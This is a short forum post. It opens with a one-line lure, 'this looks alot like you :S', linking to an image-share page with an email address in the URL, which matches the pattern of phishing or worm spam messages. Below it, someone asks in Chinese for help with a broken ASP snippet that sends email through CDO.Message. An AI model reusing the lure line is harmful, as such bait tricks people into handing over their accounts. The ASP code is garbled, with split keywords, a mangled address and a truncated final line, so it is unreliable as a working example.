this looks alot like you :S http://imageshare.madpage.com/view.php?=azores10@hotmail.com
有没有人可以帮我修改??有code了但是不能function,thanks!!!
<%
Set myMail=Cr eObject("CDO.Message")
myMail.Subject="Sending email with CDO"
myMail.From="textfield4"
myMail.To="emobile08 yahoo.com"
myMail.TextBody="textfield3"
myMail.Send
set myMail= t ng
%>